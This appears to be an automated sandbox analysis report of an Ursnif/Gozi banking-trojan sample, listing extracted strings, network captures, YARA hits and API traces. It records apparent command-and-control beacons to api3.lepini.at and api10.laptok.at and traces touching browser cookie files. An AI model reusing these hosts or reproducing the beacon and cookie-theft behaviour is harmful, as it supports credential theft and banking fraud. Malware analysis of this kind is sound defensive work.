w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

HTTP traffic detected: POST /api1/U2cJFG4d72Sw1/coZoTMXb/lP1gviHXrIHWsvunsGl6cnc/P0V_2BL3fj/46b0n6i8fucqBFlqF/hcagnGa1TbpS/dgul3xzYijV/L8f_2B7T21euzh/9_2ByVhlbD4q5WftmVdrM/zBjLhgYQ1PYM0cHh/x5hh2ZDx_2FdFJL/wYla_2Frk0rvM65swQ/cH6PtCte0/lwimgIOiQ_2Fctv6niAP/fIjCPduuWdUdoTOKkQg/18uc85TvLrI_2BdUpjqsJC/iPMSa8oRiSqUF/LVEeH34R/iuq5fk_2BzVlr4Uczzgpoea/kUr98o_2Bs/jBUez8HK/7Gj8QOr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Jan 2021 18:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: {0631AB9B-6052-11EB-90E6-ECF4BB82F7E0}.dat.3.dr, ~DFC755D5147CF6BDD9.TMP.3.dr	String found in binary or memory: http://api10.laptok.at/api1/fMoOyVtNHyb2CKT5h4Jv/cOtoUxpSs_2B7b6ktW6/8gKDvU8GZHurEn2nukEHAM/mBRpHfez
Source: regsvr32.exe, 00000001.00000003.375956892.0000000002C40000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000003.376076963.0000000002C50000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav9297Yj0
Source: {1136F6F8-6052-11EB-90E6-ECF4BB82F7E0}.dat.3.dr	String found in binary or memory: http://api10.laptok.at/api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yE
Source: {0631AB9D-6052-11EB-90E6-ECF4BB82F7E0}.dat.3.dr, ~DFBBE82018C43F3C1D.TMP.3.dr	String found in binary or memory: http://api10.laptok.at/api1/zu_2FE7OgtG1YElZCJHzk/3Z6oZ2v_2FSvhdpl/3dtqOsJj6Y7KZxP/RohYJ_2FHTGS4WhMs
Source: regsvr32.exe, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001D.00000003.445362974.00000233EF2C7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, powershell.exe, 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: powershell.exe, 0000001D.00000002.446586798.0000023380001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 0000001D.00000002.447576519.000002338020F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1611686651&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1611686651&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1611686652&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1611686651&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: powershell.exe, 0000001D.00000002.467349112.0000023390064000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1d6YmM.img?h=368&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch&ued=https%
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFE1BCDF1B7A4F52FD.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49740 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
